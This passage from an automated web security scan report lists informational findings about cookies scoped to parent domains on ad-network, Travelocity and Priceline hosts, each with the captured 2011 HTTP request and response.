Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538936&ct=106934&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1074&cwu=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306%7E2469333%2C00.html&cwr=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html&mrnd=96724040&if=0&tl=1&pxy=238,508&cxy=1074,906&dxy=1074,906&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5997
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: 538936_3_106934_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59764_2_3KjzP; Domain=.contextweb.com; Expires=Wed, 02-Oct-2041 19:49:28 GMT; Path=/
Set-Cookie: CDSActionTracking6=ENufC6tGDSs5|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6w|3UPoY; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 19:49:27 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0D%0Afunction%20pr_swfver%28%29%7B%0D%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0D%0Aif%28nv.plugins
...[SNIP]...
13.133. http://tap.rubiconproject.com/oz/feeds/targus/profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7845/12566
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; dq=5|5|0|0; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk2=0; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; rdk15=0; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 204 No Content
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: dq=7|7|0|0; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: lm="2 Oct 2011 23:51:41 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

13.134. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=7743/12359&cd=false&xt=16&k=pm+bst:248,norwich+city:192,7+11:160,10+7:160,unbeaten+run:144,keep+unbeaten:144,manchester+united:144,will+keep:144,confident+manchester:144,anderson+confident:144,run+going:144,united+will:144,football+news:128,news:94,city+goal:80,champions+league:80,watch:76,will+give:64,table+results:64,football+new:64,45+pm:64,00+pm:64,7+45:64,old+trafford:64,15+00:64,match+kicks:64,trafford+crowd:64,newly+promoted:64,crowd+will:64,midfielder+believes:64,brazilian+midfielder:64,promoted+club:64,goal:60,football:60,europa+league:56,30+pm:56,manchester:52,united:52,norwich:50,15+pm:48,&t=Anderson+confident+Manchester+United+will+keep+unbeaten+run+going+against+Norwich+City+-+Goal.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 204 No Content
Date: Mon, 03 Oct 2011 00:01:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: dq=8|6|2|0; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

13.135. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:07 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 941
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:07 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...
13.136. http://travel.travelocity.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

13.137. http://travel.travelocity.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
13.138. http://travel.travelocity.com/hotel/HotelDetail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
13.139. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...
13.140. http://travela.priceline.com/sharedapps/scs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /sharedapps/scs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharedapps/scs?val=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3&ts=1317600634270 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:58 GMT
Server: Apache
Set-Cookie: SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; Domain=.priceline.com; Expires=Thu, 01-Dec-2011 04:59:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
